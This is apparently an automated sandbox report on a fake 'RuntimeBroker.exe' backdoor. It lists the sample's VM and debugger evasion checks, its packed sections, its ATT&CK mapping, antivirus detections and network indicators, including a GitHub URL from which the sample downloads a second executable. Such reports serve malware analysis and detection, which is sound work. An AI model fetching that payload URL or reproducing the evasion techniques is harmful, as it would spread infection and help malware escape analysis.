Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q"SOFTWARE\VMware, Inc.\VMware Tools
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'C:\WINDOWS\system32\drivers\vmmouse.sys
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RuntimeBroker.exe, 00000000.00000002.1548099069.00000000012CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Code function: 0_2_0584EF80 CheckRemoteDebuggerPresent,

0_2_0584EF80

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe	Queries volume information: C:\Users\user\Desktop\RuntimeBroker.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\RuntimeBroker.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\RuntimeBroker.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	151 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
RuntimeBroker.exe	39%	ReversingLabs	Win32.Trojan.Generic
RuntimeBroker.exe	100%	Avira	BDS/Backdoor.Gen
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://raw.githubusercontent.comd	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
ax-9999.ax-msedge.net	150.171.28.254	true	false	high
github.com	140.82.114.4	true	false	high
raw.githubusercontent.com	185.199.108.133	true	false	high
c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com	unknown	unknown	false	high
35.56.3.0.in-addr.arpa	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://github.com/cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe	RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com	RuntimeBroker.exe, 00000000.00000002.1549193132.000000000339E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	false		high
http://raw.githubusercontent.comd	RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com	RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003321000.00000004.00000800.00020000.00000000.sdmp	false		high
http://raw.githubusercontent.com	RuntimeBroker.exe, 00000000.00000002.1549193132.0000000003648000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
140.82.114.4	github.com	United States		36459	GITHUBUS	false
185.199.108.133	raw.githubusercontent.com	Netherlands		54113	FASTLYUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1651706
Start date and time:	2025-03-29 13:59:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RuntimeBroker.exe
Detection:	MAL
Classification:	mal92.evad.winEXE@1/0@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 26 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Excluded IPs from analysis (whitelisted): 23.96.180.189, 20.12.23.50, 20.3.187.198, 150.171.28.254, 2.23.227.208
Excluded domains from analysis (whitelisted): www.bing.com, ax-ring.msedge.net, fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, arc.trafficmanager.net, iris-de-prod-azsc-v2-ncus.northcentralus.cloudapp.azure.com, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:00:36	API Interceptor	15x Sleep call for process: RuntimeBroker.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
140.82.114.4	Revised - College of the canyons 2025 Handbook80114.doc	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	https://publuu.com/flip-book/830106/1826131	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	https://publuu.com/flip-book/830106/1826131	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	https://fairwaymarket.cloud/TWFyay5SdWRlQEhzY3BvbHkuQ29t##	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	Nationalmi_receipt0291.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	https://digstudio.sharefile.com/public/share/web-sf9877201d645406b84b8dca7035ef0a9	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	Revised - Hartzellprop.com 2025 Handbook29828.doc	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	suspectTelling clean needful (78.2 KB).msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	h2H2R15NDO.exe	Get hash	malicious	LummaC Stealer	Browse
185.199.108.133	cr_asm.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gaber.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	cr_asm.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ax-9999.ax-msedge.net	7NOT92-GmT6-1OjO9-R14.msi	Get hash	malicious	Unknown	Browse	150.171.27.254
	https://eu-central-1.protection.sophos.com/?d=klclick3.com&u=aHR0cHM6Ly9jdHJrLmtsY2xpY2szLmNvbS9sLzAxSlE2TldIMFdaVkdNV0tBODFNQkZGN1JUXzI=&p=m&i=NjcwOGRlNTQxNWVkNDAyNmUyZjA5MzFh&t=VUNaZ1Yza2szQkUxQ2V5U3gwNDYvRXh1ZWpOb1orVWYwMkVMRzFlQmtmMD0=&h=696c0b13c9bb46b2b210e89a34578cd9&s=AVNPUEhUT0NFTkNSWVBUSVbYlGfZU66j8K_UDSuTsyS5h7hisQMzbX-xxgbWnDCCvg	Get hash	malicious	HTMLPhisher	Browse	150.171.27.254
	3Judiciario02-jRc3-8Gwc1-T12.msi	Get hash	malicious	Unknown	Browse	150.171.27.254
	6FUm1OkfM3.exe	Get hash	malicious	CryptOne	Browse	150.171.27.254
	RXFXJSCBCP.exe	Get hash	malicious	CryptOne	Browse	150.171.27.254
	random.exe2.exe	Get hash	malicious	Healer AV Disabler	Browse	150.171.27.254
	AG5SpY2I0y.exe	Get hash	malicious	XWorm	Browse	150.171.27.254
	UeiROaQBew.exe	Get hash	malicious	Unknown	Browse	150.171.28.254
	http://fliqlo.app	Get hash	malicious	Unknown	Browse	150.171.27.254
	Df2V52Gob5.exe	Get hash	malicious	Rusty Stealer	Browse	150.171.27.254
raw.githubusercontent.com	climb.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.110.133
	x-ray-health-record.bat	Get hash	malicious	Braodo	Browse	185.199.108.133
	xxrkjufx.exe	Get hash	malicious	NeptuneRAT	Browse	185.199.111.133
	Logger.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	MasonClient.exe	Get hash	malicious	NeptuneRAT	Browse	185.199.111.133
	SecuriteInfo.com.Trojan.GenericKD.76058097.12003.12326.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
	SecuriteInfo.com.Trojan.GenericKD.76058097.12003.12326.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	u1.ps1	Get hash	malicious	Unknown	Browse	185.199.110.133
	S0FTWARE.exe	Get hash	malicious	Vidar	Browse	185.199.111.133
	x96lib.exe	Get hash	malicious	NeptuneRAT	Browse	185.199.111.133
github.com	climb.exe	Get hash	malicious	LummaC Stealer	Browse	140.82.112.3
	t3333-03-2825.bat	Get hash	malicious	Braodo	Browse	140.82.112.3
	x-ray-health-record.bat	Get hash	malicious	Braodo	Browse	140.82.114.3
	https://jv.wijaxbosjm.es/nwbGgL/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.3
	Revised - College of the canyons 2025 Handbook80114.doc	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.4
	xxrkjufx.exe	Get hash	malicious	NeptuneRAT	Browse	140.82.113.3
	Logger.exe	Get hash	malicious	Unknown	Browse	140.82.113.3
	MasonClient.exe	Get hash	malicious	NeptuneRAT	Browse	140.82.113.3
	https://L1h.toliviraxen.ru/MzobBPAf/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.3
	https://publuu.com/flip-book/830106/1826131	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.4

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GITHUBUS	climb.exe	Get hash	malicious	LummaC Stealer	Browse	140.82.112.3
	t3333-03-2825.bat	Get hash	malicious	Braodo	Browse	140.82.112.3
	x-ray-health-record.bat	Get hash	malicious	Braodo	Browse	140.82.114.3
	https://jv.wijaxbosjm.es/nwbGgL/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.3
	Revised - College of the canyons 2025 Handbook80114.doc	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.4
	xxrkjufx.exe	Get hash	malicious	NeptuneRAT	Browse	140.82.113.3
	Logger.exe	Get hash	malicious	Unknown	Browse	140.82.113.3
	MasonClient.exe	Get hash	malicious	NeptuneRAT	Browse	140.82.113.3
	https://L1h.toliviraxen.ru/MzobBPAf/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.3
	https://publuu.com/flip-book/830106/1826131	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.114.4
FASTLYUS	maksrat.jar	Get hash	malicious	Unknown	Browse	199.232.88.209
	climb.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.110.133
	7ivgZ6j7.pdf	Get hash	malicious	Unknown	Browse	199.232.90.172
	https://saonacollection.com/Core/-/userid/chudy	Get hash	malicious	Unknown	Browse	151.101.194.132
	https://saonacollection.com/Core/-/userid/chudy	Get hash	malicious	Unknown	Browse	151.101.66.132
	arm6.elf	Get hash	malicious	Unknown	Browse	199.232.90.49
	x-ray-health-record.bat	Get hash	malicious	Braodo	Browse	185.199.108.133
	https://jv.wijaxbosjm.es/nwbGgL/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	Hess Vioce Message.pdf	Get hash	malicious	Unknown	Browse	23.185.0.1
	https://beekbyanna.formstack.com/forms/info	Get hash	malicious	HTMLPhisher	Browse	199.232.88.157

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	climb.exe	Get hash	malicious	LummaC Stealer	Browse	140.82.114.4
	t3333-03-2825.bat	Get hash	malicious	Braodo	Browse	140.82.114.4
	66GPrIRLfp.exe	Get hash	malicious	Discord Token Stealer	Browse	140.82.114.4
	x-ray-health-record.bat	Get hash	malicious	Braodo	Browse	140.82.114.4
	xxrkjufx.exe	Get hash	malicious	NeptuneRAT	Browse	140.82.114.4
	XCsslient.exe	Get hash	malicious	XWorm	Browse	140.82.114.4
	SPChaotic.exe	Get hash	malicious	XWorm	Browse	140.82.114.4
	SysRuntime.exe	Get hash	malicious	XWorm	Browse	140.82.114.4
	SystemRuntime.exe	Get hash	malicious	XWorm	Browse	140.82.114.4
	MasonClient.exe	Get hash	malicious	NeptuneRAT	Browse	140.82.114.4

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.407669504084401
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RuntimeBroker.exe
File size:	79'392 bytes
MD5:	61fd0424631fc50f17989c516950935e
SHA1:	8b616f88f47a9aa473512a91a8b3b39a7949aff7
SHA256:	c829147f0697e5a7c72e6aaac0b092b4d2a5e3d6a0132d540c49d2ea432877b9
SHA512:	e0bc65029e6fe0e7b4bf12d7ef5b3e64dbd926778c7e6df6c1c72ab754c36eeba7a837d8a611510aa729fce648aa01af8c1f0d3aebcfc89978718c22e3f3ffff
SSDEEP:	1536:Yzp+nkIgYxM+hTjAo1RGBbrd9BPJXyyRTB:aZT9+NsuRebrhPJj/
TLSH:	6873B301F4415601E498357AC1E6A8B8137DA5FBE263814A6FF223D7CBE35D21E47A8F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,............."...0......$...........@... ....@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x41a00a
Entrypoint Section:	UPX
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xA6EAA72C [Fri Sep 27 23:47:56 2058 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0041A000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xab3c	0x4f
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x5de
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x20000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a000	0x8	UPX
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x4000	0x48
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
w7	0x2000	0xaa4	0xc00	e78a8b487ff2cb0f91bc58ada7786c16	False	1.0035807291666667	data	7.939048109812574	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x4000	0x10a74	0x10c00	50fe44d0824f34b42a70297a79b85769	False	0.4703533115671642	data	6.447239384693461	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
	0x16000	0x5de	0x600	6df8f39be90781d07b101c31e07590ea	False	0.42578125	data	4.162010888053922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.Enigma	0x18000	0xa	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX	0x1a000	0x10	0x200	a8be9c99d1e250a82a199e42ed72ef0a	False	0.04296875	data	0.12227588125913882	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
zjifahsi	0x1c000	0xb81	0xc00	9d982ae05f0799aa9dcb630b1c990a28	False	0.24674479166666666	data	5.361450215834434	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.UPX	0x1e000	0x8b	0x200	c391ba0c64258e9d98fe84a6864df69b	False	0.0390625	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x20000	0xc	0x200	aff5b30ceb43f61f913db3abeba94533	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x160a0	0x354	data			0.4166666666666667
RT_MANIFEST	0x163f4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments	RuntimeBroker
CompanyName	Microsoft Inc.
FileDescription	RuntimeBroker
FileVersion	1.0.0.0
InternalName	RuntimeBroker.exe
LegalCopyright	Copyright 2015
LegalTrademarks
OriginalFilename	RuntimeBroker.exe
ProductName
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 18
• 443 (HTTPS)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2025 14:00:36.612060070 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.612101078 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:36.612175941 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.632260084 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.632280111 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:36.874435902 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:36.874514103 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.878875017 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.878889084 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:36.879178047 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:36.929311037 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.951514006 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:36.992285967 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:37.204689980 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:37.204783916 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:37.204853058 CET	443	49712	140.82.114.4	192.168.2.5
Mar 29, 2025 14:00:37.206286907 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:37.206729889 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:37.210618019 CET	49712	443	192.168.2.5	140.82.114.4
Mar 29, 2025 14:00:37.305083990 CET	49713	443	192.168.2.5	185.199.108.133
Mar 29, 2025 14:00:37.305114985 CET	443	49713	185.199.108.133	192.168.2.5
Mar 29, 2025 14:00:37.305223942 CET	49713	443	192.168.2.5	185.199.108.133
Mar 29, 2025 14:00:37.305546999 CET	49713	443	192.168.2.5	185.199.108.133
Mar 29, 2025 14:00:37.305557013 CET	443	49713	185.199.108.133	192.168.2.5
Mar 29, 2025 14:00:39.954952955 CET	49713	443	192.168.2.5	185.199.108.133

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2025 14:00:36.498598099 CET	52530	53	192.168.2.5	1.1.1.1
Mar 29, 2025 14:00:36.598462105 CET	53	52530	1.1.1.1	192.168.2.5
Mar 29, 2025 14:00:37.214771986 CET	57515	53	192.168.2.5	1.1.1.1
Mar 29, 2025 14:00:37.304069042 CET	53	57515	1.1.1.1	192.168.2.5
Mar 29, 2025 14:00:38.923979998 CET	65470	53	192.168.2.5	1.1.1.1
Mar 29, 2025 14:00:39.026340961 CET	53	65470	1.1.1.1	192.168.2.5
Mar 29, 2025 14:00:44.655904055 CET	55008	53	192.168.2.5	1.1.1.1
Mar 29, 2025 14:00:44.754340887 CET	53	55008	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 29, 2025 14:00:36.498598099 CET	192.168.2.5	1.1.1.1	0xf5c7	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:37.214771986 CET	192.168.2.5	1.1.1.1	0x1185	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:38.923979998 CET	192.168.2.5	1.1.1.1	0x99d9	Standard query (0)	35.56.3.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Mar 29, 2025 14:00:44.655904055 CET	192.168.2.5	1.1.1.1	0x7bad	Standard query (0)	c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
